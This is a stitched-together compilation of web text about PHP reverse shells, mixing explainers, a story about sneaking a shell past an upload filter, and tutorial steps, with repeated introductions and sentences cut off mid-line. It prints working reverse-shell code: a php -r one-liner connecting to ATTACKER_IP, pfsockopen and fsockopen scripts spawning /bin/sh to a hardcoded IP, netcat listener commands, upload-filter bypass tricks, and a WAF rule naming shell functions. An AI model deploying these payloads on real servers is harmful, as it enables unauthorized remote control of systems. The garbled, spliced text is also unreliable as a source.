PHP reverse shell is a common technique used in ethical hacking and penetration testing to gain interactive command-line access to a remote web server. Unlike a standard "bind shell", where an attacker connects directly to a server, a reverse shell forces the server to initiate an outbound connection back to the attacker. (Check Point Software)

How it Works
Listener Setup: The attacker starts a "listener" on their own machine (e.g., using Netcat: nc -lvnp 1234) to wait for incoming connections.
Payload Delivery: The attacker uploads or executes a PHP script on the target server, often by exploiting a file upload vulnerability or Remote Code Execution (RCE).
Connection Establishment: When the PHP script is run (e.g., by visiting its URL), it uses PHP's networking functions (like ) to connect back to the attacker's IP and port.
Interactive Session: Once connected, the server redirects its standard input and output to the attacker, providing a functional command-line interface.

Reverse Shell Attacks: Real-World Examples and Prevention
This report examines the mechanics, implementation, and security implications of PHP-based reverse shells, a common technique used by security researchers and malicious actors to gain remote access to web servers.

Executive Summary
A PHP reverse shell is a script that, when executed on a target server, initiates an outbound connection to an attacker-controlled machine. This provides the attacker with an interactive command-line interface (shell) running with the privileges of the web server user (e.g., www-data or apache).

1. Core Mechanisms
The primary goal of a reverse shell is to bypass firewalls that typically block incoming connections but allow outgoing traffic.
Outgoing Connection: The script is programmed with a hardcoded IP address and port.
Process Spawning: It uses PHP functions like proc_open(), system(), or shell_exec() to spawn a shell (such as /bin/sh or /bin/bash on Linux).
I/O Redirection: The script redirects the shell's standard input (stdin), output (stdout), and error (stderr) to the established TCP connection.

2. Common Implementation Scenarios
Reverse shells are often the "second stage" of an attack, following a successful initial exploit.
A PHP reverse shell is a script designed to establish an outbound connection from a target web server back to an attacker's machine. This technique is frequently used in penetration testing and CTF (Capture The Flag) challenges to gain remote command-line access while bypassing inbound firewall restrictions.

Popular PHP Reverse Shell Tools
There are several well-known scripts and tools used to generate these shells:
Pentestmonkey's PHP Reverse Shell: Widely considered the standard, this script is highly reliable and easily configurable. You can find it on GitHub or pre-installed in Kali Linux under /usr/share/webshells/php.
MSFVenom: A powerful payload generator from the Metasploit Framework that can create custom PHP reverse shells using commands like msfvenom -p php/meterpreter_reverse_tcp.
Flast101's Cheat Sheet: Offers concise one-liner PHP commands using shell_exec to trigger shells through system binaries like /bin/bash or PowerShell.

Typical Workflow for Implementation
A PHP reverse shell is a script, often just a single line, that forces a target server to "call back" to an attacker's machine, handing over full command-line control of the web server. In the world of cybersecurity, it is the ultimate "gotcha" for a penetration tester.
Here is the story of a classic digital heist involving this tool.

The Legend of the "Profile Pic" Breach
The story begins with a security researcher, let's call him "Alex," testing a high-security corporate portal. To the casual observer, the site was a fortress, but Alex found a tiny crack: a profile picture upload.
Alex didn't upload a photo of himself. Instead, he took the famous pentestmonkey PHP reverse shell, a legendary script used by hackers worldwide.

The Cat-and-Mouse Game
The server's "guards" (security filters) were tough. Alex tried several tricks to sneak the script past them:
The Disguise: He renamed the file (e.g., to shell.jpg.php or shell.phtml) to fool the extension check.
The Magic Header: He added "GIF89a;" to the top of the file, making the server think it was a GIF image.
The Final Strike: Eventually, he found that the server only checked the "Content-Type" header. By changing it to image/jpeg while keeping the PHP code inside, he slipped through the gate.

The Moment of Truth
Alex set up a "listener" on his own laptop (using a tool called Netcat), waiting in the dark for a connection. He then navigated to the URL of his "photo":
A PHP reverse shell is a script that, when executed on a target web server, initiates an outbound connection back to your machine, providing a command-line interface to the server. This technique is commonly used during penetration testing to gain interactive access after discovering a file upload or code execution vulnerability.

1. Obtain a Reverse Shell Script
The most reliable way to establish a connection is to use an established, pre-written script.
Pentest Monkey PHP Reverse Shell: Widely considered the industry standard for PHP web shells. It provides a full interactive shell that supports interactive programs like ssh or su. You can download it from the Pentest Monkey GitHub repository.
Kali Linux Local Copy: If you are using Kali Linux, a copy is already available at /usr/share/webshells/php/php-reverse-shell.php.
MSFVenom: You can generate a custom payload using Metasploit with the following command: msfvenom -p php/meterpreter_reverse_tcp LHOST=

2. Configure the Script
Before uploading, you must edit the script to point back to your machine. Open the .php file in a text editor like nano. Locate the $ip and $port variables.
Change $ip to your attacking machine's IP address (use your VPN IP if on a platform like Hack The Box).
Set $port to any open port on your machine (e.g., 4444 or 1234).

3. Start a Listener
On your attacking machine, you must set up a listener to "catch" the incoming connection.

RootMe (CTF Walkthrough). A TryHackMe Lab | by Marduk I Am
A PHP reverse shell is a common technique used in penetration testing where a compromised target machine initiates a connection back to an attacker's machine. Unlike a bind shell, which waits for an incoming connection, a reverse shell bypasses inbound firewall rules by sending traffic outward to the attacker.

How it Works
A reverse shell typically follows a simple three-step process:
Listener Setup: The attacker opens a port on their machine (e.g., using nc -lvnp 1234) to wait for the incoming connection.
Payload Delivery: The attacker uploads or injects a PHP script onto the target web server.
Execution: When the PHP script is executed, it opens a TCP socket and connects to the attacker's IP and port, providing an interactive command-line shell.

Common Methods & Scripts
PHP reverse shells vary in complexity, from simple one-liners to feature-rich scripts:
Dhayalanb/windows-php-reverse-shell (GitHub)
pentestmonkey/php-reverse-shell (GitHub)
A PHP reverse shell is a common technique used in penetration testing to gain interactive command-line access to a remote server. Unlike a standard shell where you connect to the server, a reverse shell forces the server to initiate an outbound connection to your machine. This is highly effective because most firewalls allow outgoing traffic even if they block incoming connections.

Deep Dive: Understanding and Using PHP Reverse Shells

1. How a Reverse Shell Works
In a typical client-server model, the client connects to a listening port on the server. However, a reverse shell "inverts" this:
The Attacker sets up a "listener" on their machine, waiting for a connection.
The Target (Victim) executes a script (like a PHP file) that reaches out to the attacker's IP and port.
The Result is a communication pipe where the attacker can send commands that the target executes, returning the output back to the attacker.

2. Common PHP Payloads
There are two primary ways to deploy a PHP reverse shell: as a one-liner command or as a full script file.

The "One-Liner"
If you have Remote Code Execution (RCE) via a web form or URL parameter, you can often trigger a shell with a single line:
php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
fsockopen: Opens a TCP connection to the attacker.
exec: Runs a shell (/bin/sh) and redirects its input, output, and error streams (<&3 >&3 2>&3) to the open network socket.

The Standalone Script
For more stable connections, professionals often use the PentestMonkey PHP Reverse Shell or Ivan Sincek's Shell. These scripts are more robust, handling various edge cases and providing a more "interactive" feel.

Reverse Shell Cheat Sheet: PHP, ASP, Netcat, Bash & Python
Understanding and Protecting Against Reverse Shell Attacks in PHP
In the realm of cybersecurity, reverse shell attacks are a sophisticated method used by attackers to gain unauthorized access to a target system. When it comes to PHP, a popular server-side scripting language, the risk of such attacks cannot be overstated. This article aims to shed light on what reverse shell attacks in PHP entail, how they work, and most importantly, how to protect your applications against them.
A netcat shell is fragile. Upgrade it:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Then press Ctrl+Z
stty raw -echo; fg
export TERM=xterm
pfsockopen() is less commonly monitored and creates a persistent connection.
<?php
// Persistent TCP connection back to the listener (change the address and port)
$sock = pfsockopen("192.168.1.10", 4444);
// Spawn an interactive shell with the socket as its stdin, stdout and stderr
$proc = proc_open("/bin/sh -i", [0=>$sock,1=>$sock,2=>$sock], $pipes);
?>
A modern WAF (ModSecurity, Cloudflare, AWS WAF) can detect common reverse shell signatures.
Example ModSecurity rule:
SecRule ARGS "fsockopen|pfsockopen|shell_exec|system|/bin/sh" \
"id:123456,deny,status:403,msg:'PHP Reverse Shell Detected'"
<?php
// Set the attacker's IP and listening port
$ip = '192.168.1.10'; // CHANGE THIS
$port = 4444;         // CHANGE THIS

// Create a TCP socket (30-second connect timeout)
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)<br />\n");

// Duplicate socket descriptors for STDIN, STDOUT, STDERR
// (assumes the socket is file descriptor 3, i.e. the first stream opened by the script)
shell_exec('/bin/sh -i 0<&3 1>&3 2>&3');

// Close the socket
fclose($sock);
?>
Warning: Unauthorized access to computer systems is illegal. This is for authorized pen-testing and educational purposes only.